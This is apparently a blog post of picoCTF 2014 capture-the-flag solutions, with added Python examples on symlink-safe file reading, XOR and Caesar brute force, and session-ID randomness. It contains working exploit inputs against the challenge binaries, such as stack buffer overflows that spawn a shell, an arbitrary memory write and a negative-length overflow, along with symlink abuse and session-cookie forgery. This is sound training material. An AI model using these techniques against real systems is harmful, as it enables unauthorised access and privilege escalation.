
Hello! Today I'm going to write simple writeups (without the reasoning) to wrap up what I solved in picoCTF 2014. Please feel free to ask questions about specific problems or the reasoning in the comments. Hope you enjoy.


Tyrannosaurus Hex - 10

The contents of the flash drive appear to be password protected. On the back of the flash drive, you see the hexadecimal number 0x912d2e43 scribbled in ink. The password prompt, however, only accepts decimal numbers. What number should you enter? 
0x912d2e43=2435657283


No Comment - 20

The CD you find has a copy of your father's website: homepage.html. Maybe something is hidden in the site...

In Chrome, right click and choose Inspect Element; the password sits in an HTML comment:

"<!-- In case you forget, the password for this site is: flag_bf207f2786e38ceb49fa66d36f996d5ac2cbfd6b -->"



Common Vulnerability Exercise - 20

This disc is encrypted. The surprisingly elaborate password hint refers to "the CVE Identifier for a 2014 vulnerability that allowed arbitrary code execution in Firefox via a buffer overflow in a speech codec". If you found this "CVE-ID" thingy, it'd probably be the password.
Go to https://cve.mitre.org and search for the keywords 'arbitrary code execution in Firefox via a buffer overflow in a speech codec'. Try the few CVEs that come up; the one that matches is CVE-2014-1542.


Caesar - 20

You find an encrypted message written on the documents. Can you decrypt it?
encrypted.txt:

vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha


Go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript (an automatic Caesar cipher breaker), paste the message and click Break code! The best-scoring shift is 2:


thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy


The Valley of Fear - 20

The hard drive may be corrupted, but you were able to recover a small chunk of text. Scribbled on the back of the hard drive is a set of mysterious numbers. Can you discover the meaning behind these numbers? (1, 9, 4) (4, 2, 8) (4, 8, 3) (7, 1, 5) (8, 10, 1)
(Paragraph #, Line #, Word # from left side) makes up "the flag is Ceremonial plates"


Internet Inspection - 30

On his computer, your father left open a browser with the Thyrin Lab Website. Can you find the hidden access code?
Open Google Chrome, open Inspect Element, and expand the markup of the gridded part of the page -> flag_9128b5712ce17849f619b5a082e4367f7a9c0d08


RoboPhoto - 30

Your father has been known to use the titles of his favorite books as passwords. While you don't remember any of the names of the books, your father keeps a poster for one of them on his wall. Can you figure out the name of the book and unlock the CD?
Go to Google Images, paste the poster image's URL (reverse image search) and hit enter: The Positronic Man


This is the Endian - 40

This is the end! Solving this challenge will help you defeat Daedalus's cyborg. You can find more information about endianness and the problem here. The flag is the smallest possible program input that causes the program to print "Access Granted".
The two words 0x52657663 and 0x30646521 written in little-endian byte order are "\x63\x76\x65\x52" and "\x21\x65\x64\x30". Plug the bytes \x63\x76\x65\x52\x21\x65\x64\x30 into the 'data preview' on the problem page and read them as ASCII: cveR!ed0


Supercow - 40

Daedalus Corp. has a special utility for printing .cow files at /home/daedalus/supercow. Can you figure out how to get it to print out the flag?

Simply symlink flag.txt under a .cow name: supercow accepts the name and follows the link.

pico19855@shell:~$ cd /home/daedalus
pico19855@shell:/home/daedalus$ ls
flag.txt  hint.cow  secret1.cow  secret2.cow  supercow  supercow.c
pico19855@shell:/home/daedalus$ ./supercow secret1.cow
 ____________
< cow_text_1 >
 ------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow
pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow
 ______________
< I_LOV_BNANAS >
 --------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
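What makes Supercow exploitable is that it behaves as if the only check is on the file name, while open() follows whatever that name points at. The following is an added example, not the challenge's supercow.c (the page does not reproduce it): naive_read() mirrors a name-only check, and safe_read() shows what a setgid file viewer actually has to do: resolve the path and confine it to an allowed directory, open with O_NOFOLLOW so a link at the last component is refused by the kernel, and fstat the descriptor it actually got. The directory layout built in demo() is constructed for the example.

```python
# Added example: a name-only ".cow" check beside a hardened version of it.
# Not the challenge's source; the layout in demo() is constructed here.
import os
import stat
import tempfile


class UnsafePath(Exception):
    pass


def naive_read(path):
    """What a name-only check amounts to: accept '*.cow', then follow anything."""
    if not path.endswith('.cow'):
        raise UnsafePath('not a .cow file')
    with open(path) as f:
        return f.read()


def safe_read(path, allowed_dir):
    """Read a .cow file only if it is a regular, non-symlink file that really
    lives inside allowed_dir."""
    if not path.endswith('.cow'):
        raise UnsafePath('not a .cow file')
    allowed_real = os.path.realpath(allowed_dir)
    # 1. canonicalise and confine: the resolved target must be under allowed_dir
    target = os.path.realpath(path)
    if os.path.commonpath([allowed_real, target]) != allowed_real:
        raise UnsafePath('path escapes %s' % allowed_dir)
    # 2. open without following a symlink at the final component, so a link
    #    swapped in between the check above and the open is refused (ELOOP)
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as e:
        raise UnsafePath('refusing symlink or unreadable path: %s' % e)
    try:
        # 3. check the object we actually opened, not the name
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise UnsafePath('not a regular file')
        with os.fdopen(fd, 'r') as f:
            fd = -1  # ownership passed to the file object
            return f.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Constructed layout: cows/hint.cow, a flag.txt next to the cows directory,
    and a symlink cows/asdf.cow -> ../flag.txt like the one in the writeup."""
    root = tempfile.mkdtemp()
    cows = os.path.join(root, 'cows')
    os.mkdir(cows)
    with open(os.path.join(root, 'flag.txt'), 'w') as f:
        f.write('I_LOV_BNANAS')
    with open(os.path.join(cows, 'hint.cow'), 'w') as f:
        f.write('cow_text_1')
    link = os.path.join(cows, 'asdf.cow')
    os.symlink(os.path.join('..', 'flag.txt'), link)

    results = {
        'naive_symlink': naive_read(link),  # the name check passes, the flag leaks
        'safe_regular': safe_read(os.path.join(cows, 'hint.cow'), cows),
    }
    try:
        safe_read(link, cows)
        results['safe_symlink'] = 'allowed'
    except UnsafePath as e:
        results['safe_symlink'] = 'refused: %s' % e
    return results


if __name__ == '__main__':
    for name, value in demo().items():
        print('%-14s %s' % (name, value))
```

The realpath confinement catches the writeup's link because its target resolves outside the cows directory; the O_NOFOLLOW open is the second layer, for a link whose target is inside the allowed directory or that is swapped in after the realpath check.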


Grep is Still Your Friend - 40

The police need help decrypting one of your father's files. Fortunately you know where he wrote down all his backup decryption keys as a backup (probably not the best security practice). You are looking for the key corresponding to daedaluscorp.txt.enc. The file is stored on the shell server at /problems/grepfriend/keys.
Grep it.

pico19855@shell:/home/daedalus$ cd /problems/grepfriend
pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *
daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6
pico19855@shell:/problems/grepfriend$ 



Javascrypt - 40

Tyrin Robotics Lab uses a special web site to encode their secret messages. Can you determine the value of the secret key?

Run alert(key); in the JavaScript console. (The key differs per user.)


The page at https://picoctf.com says: flag_3645



Easy Overflow - 40

Is the sum of two positive integers always positive?
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.

If a signed 32-bit integer is pushed past INT_MAX (2147483647) it wraps around and becomes negative. 2147483648 - 1712058 = 2145771590, so adding that takes the sum to exactly 2147483648, which as a signed 32-bit value is -2147483648.

pico19855@shell:~$ nc vuln2014.picoctf.com 50000
Your number is 1712058. Can you make it negative by adding a positive integer?
2145771590
Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!

Thanks for playing.



Write Right - 50

Can you change the secret? The binary can be found at /home/write_right/ on the shell server. The source can be found here.

pico19855@shell:/home/write_right$ cat write_right.c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

unsigned secret = 0xdeadbeef;

int main(int argc, char **argv){
    unsigned *ptr;
    unsigned value;

    char key[33];
    FILE *f;

    printf("Welcome! I will grant you one arbitrary write!\n");
    printf("Where do you want to write to? ");
    scanf("%p", &ptr);
    printf("Okay! What do you want to write there? ");
    scanf("%p", (void **)&value);

    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);
    *ptr = value;
    printf("Value written!\n");

    if (secret == 0x1337beef){
        printf("Woah! You changed my secret!\n");
        printf("I guess this means you get a flag now...\n");

        f = fopen("flag.txt", "r");
        fgets(key, 32, f);
        fclose(f);
        puts(key);

        exit(0);
    }

    printf("My secret is still safe! Sorry.\n");
}

pico19855@shell:/home/write_right$ gdb -q write_right
Reading symbols from write_right...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
   0x080485cd <+0>: push   %ebp
<cont..>
   0x0804865b <+142>: movl   $0x8048831,(%esp)
   0x08048662 <+149>: call   0x8048470 <puts@plt>
   0x08048667 <+154>: mov 0x804a03c,%eax    // 0x804a03c is the address of 'secret': overwrite this.
   0x0804866c <+159>: cmp    $0x1337beef,%eax
<cont...>
   0x080486fc <+303>: call   0x8048460 <__stack_chk_fail@plt>
   0x08048701 <+308>: leave  
   0x08048702 <+309>: ret    
End of assembler dump.
(gdb) x/wx 0x804a03c
0x804a03c <secret>: 0xdeadbeef
(gdb) q
pico19855@shell:/home/write_right$ ./write_right 
Welcome! I will grant you one arbitrary write!
Where do you want to write to? 0x804a03c
Okay! What do you want to write there? 1337beef
Writing 0x1337beef to 0x804a03c...
Value written!
Woah! You changed my secret!
I guess this means you get a flag now...
arbitrary_write_is_always_right
pico19855@shell:/home/write_right$ 



Overflow 1 - 50

This problem has a buffer overflow vulnerability! Can you get a shell, then use that shell to read flag.txt? You can solve this problem interactively here, and the source can be found here.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void vuln(char *input){
    char buf[16];
    int secret = 0;
    strcpy(buf, input);   /* no length check: anything past 16 bytes runs into secret */

    if (secret == 0xc0deface){
        give_shell();
    }else{
        printf("The secret is %x\n", secret);
    }
}

int main(int argc, char **argv){
    if (argc > 1)
        vuln(argv[1]);
    return 0;
}

buf is 16 bytes and secret sits right after it on the stack, so 16 bytes of filler followed by 0xc0deface in little-endian byte order (\xce\xfa\xde\xc0) overwrite secret:

pico19855@shell:/home/overflow1$ ls
flag.txt Makefile overflow1 overflow1.c
pico19855@shell:/home/overflow1$ ./overflow1 `perl -e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`
$ cat flag.txt
ooh_so_critical



Toaster Control - 50

Daedalus Corp. uses a web interface to control some of their toaster bots. It looks like they removed the command 'Shutdown & Turn Off' from the control panel. Maybe the functionality is still there...
Every button on the panel calls the same handler, e.g. http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Blink%20Lights
The removed command is still handled server-side, so request it directly: http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off (the '&' has to be encoded as %26, otherwise it is read as a query-string separator).

Toaster Defense System Controls

Shutting down

Shutdown code: flag_c49bdkeekr5zqgvc20vc



ZOR - 50

Daedalus has encrypted their blueprints! Can you get us the password? 
ZOR.py
encrypted

ZOR.py:

#!/usr/bin/python
import sys

""" Daedalus Corporation encryption script. """

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)
    return result

def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)
    return xor(input_data, key)

def decrypt(input_data, password):
    return encrypt(input_data, password)

def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

def main():
    if len(sys.argv) < 5:
        usage()
    input_data = open(sys.argv[2], 'r').read()
    result_data = ""
    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])
    else:
        usage()
    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()

main()

// Actually, I kinda got mixed up here, so thanks to the anonymous admin who made this problem (I don't remember his name). Helped a lot :)

Solution:

#!/usr/bin/python
# Python 2; the ciphertext from 'encrypted', pasted as a string literal
input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)
    return result

# Whatever the password was, encrypt() folds it into a single key byte,
# so there are only 256 possibilities: print them all and look for English.
for key in range(0, 256):
    result = xor(input_data, key)
    print(result + "\n")


output:
<gibberish..>

tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE

That line is the row for key 0x22: it flips the case of every letter and turns the spaces and digits into non-printable bytes, which is why the hex digits of the password are missing from it. The row for key 0x02 is the actual plaintext:

This message is for Daedalus Corporation only. Our blueprints for the Cyborg are protected with a password. That password is 8fc2a073fa2edddaf8d4c4bac6a8be
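Both this problem and Caesar above are single-key substitutions, so the candidate plaintexts can be scored automatically instead of eyeballing 26 or 256 rows. The following is an added example, not code from the original writeup: it scores each candidate by English letter frequency, a bonus per space and a penalty per non-printable byte, and brute-forces both the Caesar shift and the ZOR key byte. The ciphertexts are the two quoted above; the frequency table is the standard English one.

```python
# Added example: frequency-scored brute force for the two single-key ciphers
# on this page (the Caesar text and the ZOR single-byte XOR). Not part of the
# original writeup; the ciphertexts are copied from it.
from string import ascii_lowercase

# Relative letter frequencies of English text, in percent.
ENGLISH_FREQ = {
    'a': 8.2, 'b': 1.5, 'c': 2.8, 'd': 4.3, 'e': 12.7, 'f': 2.2, 'g': 2.0,
    'h': 6.1, 'i': 7.0, 'j': 0.15, 'k': 0.77, 'l': 4.0, 'm': 2.4, 'n': 6.7,
    'o': 7.5, 'p': 1.9, 'q': 0.095, 'r': 6.0, 's': 6.3, 't': 9.1, 'u': 2.8,
    'v': 0.98, 'w': 2.4, 'x': 0.15, 'y': 2.0, 'z': 0.074,
}
SPACE_BONUS = 15.0          # space is the most common symbol in English prose
UNPRINTABLE_PENALTY = 50.0  # real plaintext contains none of these


def english_score(text):
    """Higher is more English-like: sum of letter frequencies, a bonus per
    space, and a heavy penalty per non-printable character."""
    score = 0.0
    for ch in text:
        low = ch.lower()
        if low in ENGLISH_FREQ:
            score += ENGLISH_FREQ[low]
        elif ch == ' ':
            score += SPACE_BONUS
        elif not (' ' <= ch <= '~' or ch in '\t\r\n'):
            score -= UNPRINTABLE_PENALTY
    return score


def caesar_shift(text, key):
    """Decrypt a Caesar cipher: move every lowercase letter back by key."""
    out = []
    for ch in text:
        if ch in ascii_lowercase:
            out.append(ascii_lowercase[(ascii_lowercase.index(ch) - key) % 26])
        else:
            out.append(ch)
    return ''.join(out)


def break_caesar(ciphertext):
    """Try all 26 shifts; return (key, plaintext) with the best score."""
    candidates = ((english_score(caesar_shift(ciphertext, k)), k) for k in range(26))
    best_score, best_key = max(candidates)
    return best_key, caesar_shift(ciphertext, best_key)


def xor_bytes(data, key):
    """Same operation as ZOR.py's xor(): every byte XORed with one key byte."""
    return bytes(b ^ key for b in data)


def break_xor(ciphertext):
    """Try all 256 key bytes; return (key, plaintext) with the best score.
    The password ZOR.py was run with is irrelevant: only its folded key byte is."""
    best_key = max(range(256),
                   key=lambda k: english_score(xor_bytes(ciphertext, k).decode('latin-1')))
    return best_key, xor_bytes(ciphertext, best_key).decode('latin-1')


CAESAR_CT = 'vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha'
ZOR_CT = (b'Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"'
          b'vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq"'
          b':da0c251dc0gfffcd:f6a6`ca4c:`g')

if __name__ == '__main__':
    key, pt = break_caesar(CAESAR_CT)
    print('Caesar shift %d: %s' % (key, pt))
    key, pt = break_xor(ZOR_CT)
    print('XOR key 0x%02x: %s' % (key, pt))
```

The space bonus is what separates the right XOR key from its neighbours: only key 0x02 turns the ciphertext's `"` bytes into spaces, and every other key permutes the letters away from the English distribution.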



Substitution - 50

There's an authorization code for some Thyrin Labs information here, along with someone's favorite song. But it's been encrypted! Find the authorization code.
encrypted.txt:

mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv


I always use this site. Go there and paste the text above.

the authorization code is withallthecolorsofthewind  


you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know  you think you own whatever land you land on the earth is just a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name  you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew  have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind  come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth  the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends  how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon  for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind  you can own the earth and still all youll own is earth until you can paint with all the colors of the wind



Function Address - 60

We found this program file on some systems. But we need the address of the 'find_string' function to do anything useful! Can you find it for us?
chanbin@ubuntu:~/ctf/pico2014$ wget https://picoctf.com/problem-static/reversing/function-address/problem
--2014-11-24 10:48:49--  https://picoctf.com/problem-static/reversing/function-address/problem
Resolving picoctf.com (picoctf.com)... 54.83.62.93
Connecting to picoctf.com (picoctf.com)|54.83.62.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7266 (7.1K) [application/octet-stream]
Saving to: `problem'

100%[=====================================================================================>] 7,266       --.-K/s   in 0s

2014-11-24 10:48:50 (1.07 GB/s) - `problem' saved [7266/7266]

chanbin@ubuntu:~/ctf/pico2014$ ls
problem
chanbin@ubuntu:~/ctf/pico2014$ chmod +x problem
chanbin@ubuntu:~/ctf/pico2014$ ./problem
Bet you can't find the address of find_string!
Did you know that "class" appears in "the following class" at index 14?
chanbin@ubuntu:~/ctf/pico2014$ gdb -q problem
Reading symbols from /home/chanbin/ctf/pico2014/problem...(no debugging symbols found)...done.
(gdb) p find_string
$1 = {<text variable, no debug info>} 0x8048444 <find_string>
(gdb)


Basic ASM - 60

We found this program snippet.txt, but we're having some trouble figuring it out. What's the value of %eax when the last instruction (the NOP) runs?
My first reaction: Omg plz why why AT&T
I hand-calculated it. Some people were asking me for hints on this specific question; I just told them that if I was able to do it, everyone else could.

Snippet.txt

# This file is in AT&T syntax - see http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm
# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce
# AT&T syntax by default.

MOV $3187,%ebx      // ebx = 3187
MOV $26953,%eax     // eax = 26953
MOV $19902,%ecx     // ecx = 19902
CMP %eax,%ebx       // compare ebx with eax (flags from ebx - eax)
JL L1               // jump to L1 if ebx < eax (signed); 3187 < 26953, so this is taken
JMP L2              // otherwise jump to L2

L1: IMUL %eax,%ebx  // ebx = ebx * eax = 85899211
ADD %eax,%ebx       // ebx += eax, ebx = 85926164
MOV %ebx,%eax       // eax = ebx = 85926164
SUB %ecx,%eax       // eax -= ecx, eax = 85906262
JMP L3

L2: IMUL %eax,%ebx  // ebx = ebx * eax   (this path is not taken)
SUB %eax,%ebx       // ebx -= eax
MOV %ebx,%eax       // eax = ebx
ADD %ecx,%eax       // eax += ecx

L3:

NOP                 // eax = 85906262 when the NOP runs
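To check a hand calculation like the one in the comments, a few dozen lines of Python are enough to step through the snippet. This is an added example, not part of the original writeup: a minimal interpreter for exactly the instructions used above (MOV, CMP, JL, JMP, IMUL, ADD, SUB, NOP) in AT&T operand order, with 32-bit wraparound and a signed comparison for JL, which is what distinguishes JL from JB. The listing embedded in SNIPPET is the one above with the comments removed.

```python
# Added example: a tiny interpreter for the handful of AT&T-syntax instructions
# in snippet.txt, to verify the hand calculation. Not part of the original
# writeup. Registers are 32-bit; arithmetic wraps modulo 2**32 and CMP records
# the signed "dst < src" result that JL tests.
import re

MASK = 0xFFFFFFFF


def to_signed(v):
    """Interpret a 32-bit value as a signed two's-complement integer."""
    v &= MASK
    return v - (1 << 32) if v & 0x80000000 else v


def parse(source):
    """Split the listing into (mnemonic, operands) rows and a label table.
    '#' and '//' comments are stripped, blank lines ignored."""
    program, labels = [], {}
    for raw in source.splitlines():
        line = re.split(r'#|//', raw, maxsplit=1)[0].strip()
        if not line:
            continue
        if ':' in line:                       # "L1: IMUL ..." or a bare "L3:"
            label, _, line = line.partition(':')
            labels[label.strip()] = len(program)
            line = line.strip()
            if not line:
                continue
        mnemonic, _, rest = line.partition(' ')
        operands = [op.strip() for op in rest.split(',')] if rest else []
        program.append((mnemonic.upper(), operands))
    return program, labels


def run(source):
    """Execute until the NOP (or the end of the program); return the registers."""
    program, labels = parse(source)
    regs = {'eax': 0, 'ebx': 0, 'ecx': 0}
    flag_lt = False  # result of the last CMP, as signed "dst < src"
    pc = 0

    def value(op):
        # AT&T: $imm is a literal, %reg is a register
        return int(op[1:]) if op.startswith('$') else regs[op[1:]]

    while pc < len(program):
        mnemonic, ops = program[pc]
        pc += 1
        if mnemonic == 'NOP':
            break
        if mnemonic == 'MOV':             # MOV src,dst
            regs[ops[1][1:]] = value(ops[0]) & MASK
        elif mnemonic == 'ADD':           # ADD src,dst  -> dst += src
            regs[ops[1][1:]] = (regs[ops[1][1:]] + value(ops[0])) & MASK
        elif mnemonic == 'SUB':           # SUB src,dst  -> dst -= src
            regs[ops[1][1:]] = (regs[ops[1][1:]] - value(ops[0])) & MASK
        elif mnemonic == 'IMUL':          # IMUL src,dst -> dst *= src (low 32 bits)
            regs[ops[1][1:]] = (regs[ops[1][1:]] * value(ops[0])) & MASK
        elif mnemonic == 'CMP':           # CMP src,dst  -> flags from dst - src
            flag_lt = to_signed(value(ops[1])) < to_signed(value(ops[0]))
        elif mnemonic == 'JMP':
            pc = labels[ops[0]]
        elif mnemonic == 'JL':            # signed less-than from the last CMP
            if flag_lt:
                pc = labels[ops[0]]
        else:
            raise ValueError('unsupported instruction: ' + mnemonic)
    return regs


SNIPPET = """
MOV $3187,%ebx
MOV $26953,%eax
MOV $19902,%ecx
CMP %eax,%ebx
JL L1
JMP L2
L1: IMUL %eax,%ebx
ADD %eax,%ebx
MOV %ebx,%eax
SUB %ecx,%eax
JMP L3
L2: IMUL %eax,%ebx
SUB %eax,%ebx
MOV %ebx,%eax
ADD %ecx,%eax
L3:
NOP
"""

if __name__ == '__main__':
    print('eax = %d' % run(SNIPPET)['eax'])
```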



Delicious! - 60

You have found the administrative control panel for the Daedalus Corporation Website: https://web2014.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?
I used the Google Chrome extension EditThisCookie. The session_id cookie holds your session number. Change it to a number from 1 to 50 (I'd recommend 50) and the flag pops up once you refresh the page.

Welcome! You've been here before.

Your session number is 50.
We'll be tracking you using this number whenever you visit this site.

You're logged in as Dr. Florian Richards. 

Today's secret Daedalus code is: session_cookies_are_the_most_delicious
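The cookie was guessable because session numbers were handed out sequentially, so fifty requests cover every session that exists. The following is an added example, not the challenge's server code (the page does not show it): the enumeration the writeup performed, run against a store that issues sequential ids and against one that issues random tokens from the OS CSPRNG. The store, the account names and the 50-attempt budget are constructed for the example.

```python
# Added example: sequential session ids versus random ones, probed the way
# the writeup probed the "Delicious!" cookie. Not the challenge's code.
import hmac
import itertools
import secrets


class SessionStore:
    """Maps session-id cookie values to the account they authenticate."""

    def __init__(self, id_generator):
        self._new_id = id_generator
        self._sessions = {}

    def login(self, user):
        sid = self._new_id()
        self._sessions[sid] = user
        return sid

    def lookup(self, sid):
        # Compare in constant time so a random id cannot be recovered
        # character by character through timing differences.
        for stored, user in self._sessions.items():
            if hmac.compare_digest(stored, sid):
                return user
        return None


def sequential_ids():
    """The weak scheme: ids are 1, 2, 3, ... (what the writeup exploited)."""
    counter = itertools.count(1)
    return lambda: str(next(counter))


def random_ids():
    """The fix: 128 bits from the OS CSPRNG per session, URL-safe encoded."""
    return lambda: secrets.token_urlsafe(16)


def enumerate_sessions(store, attempts=50):
    """The attack from the writeup: try cookie values 1..attempts and keep
    every one the server accepts as a logged-in session."""
    hits = {}
    for n in range(1, attempts + 1):
        user = store.lookup(str(n))
        if user is not None:
            hits[str(n)] = user
    return hits


def demo():
    weak = SessionStore(sequential_ids())
    strong = SessionStore(random_ids())
    for store in (weak, strong):
        store.login('guest')
        store.login('Dr. Florian Richards')  # constructed: the account the flag was shown for
    return enumerate_sessions(weak), enumerate_sessions(strong)


if __name__ == '__main__':
    weak_hits, strong_hits = demo()
    print('sequential ids, 50 guesses:', weak_hits)
    print('random ids,     50 guesses:', strong_hits)
```

Against the sequential store the probe recovers every live session, including the doctor's, with two of its fifty guesses; against the random store it recovers nothing, and would not with 2**64 guesses either.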



Overflow 2 - 70

This problem has a buffer overflow vulnerability! Can you get a shell? You can solve this problem interactively here, and the source can be found here.

No source reading needed: gdb gives the address of give_shell, and 28 bytes of filler reach the saved return address, which is then replaced with that address in little-endian byte order (\xad\x84\x04\x08).

shell login: pico19855
Password:
pico19855@shell:/home/overflow2$ ls
flag.txt Makefile overflow2 overflow2.c
pico19855@shell:/home/overflow2$ gdb -q overflow2
Reading symbols from overflow2...(no debugging symbols found)...done.
(gdb) p give_shell
$1 = {<text variable, no debug info>} 0x80484ad <give_shell>
(gdb) q
pico19855@shell:/home/overflow2$ ./overflow2 `perl -e 'print "\x90"x28, "\xad\x84\x04\x08"'`
$ cat flag.txt
controlling_%eip_feels_great




Cyborg Secrets - 80

You found a password protected binary on the cyborg relating to its defensive security systems. Find the password and get the shutdown code! You can find it on the shell server at /home/cyborgsecrets/cyborg-defense or you can download it here.
TBH: I have no memory of solving this (I remember asking about it, though). I think I used a more "professional" way when I first solved it, but since the password is hardcoded (the hint), I just cat the program.

<gibberish>

ZogHTODO: REMOVE DEBUG PASSWORD!DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____

<gibberish>

pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test
[ASCII-art banner: "Daedalus Corp"]
Password: 2manyHacks_Debug_Admin_Test
Authorization successful.
403-shutdown-for-what



No Overflow - 140

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at /home/no_overflow/ on the shell server. The source can be found here.

How to find where the return address is: start with about 260 bytes and work your way up until eip changes. Thanks to barrebas for answering some of my questions (I solved this problem after the competition ended).

The program bounds your input with if (length < BUFSIZE), but length is a signed int while read() takes its count as an unsigned size_t. A negative number such as -1 passes the check and is then converted to a huge count, so read() fills far more than the 256-byte buf with whatever you pipe in.

Don't forget ulimit -c unlimited so that a core file is written.

pico19855@shell:~$ cat no_overflow.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define BUFSIZE 256

void greet(int length){
    char buf[BUFSIZE];
    puts("What is your name?");
    read(0, buf, length);          /* length is converted to size_t here: -1 becomes a huge count */
    printf("Hello, %s\n!", buf);
}

void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char **argv){
    int length;
    be_nice_to_people();
    puts("How long is your name?");
    scanf("%d", &length);
    if(length < BUFSIZE)           /* don't allow buffer overflow -- but a negative length passes */
        greet(length);
    else
        puts("Length was too long!");
}

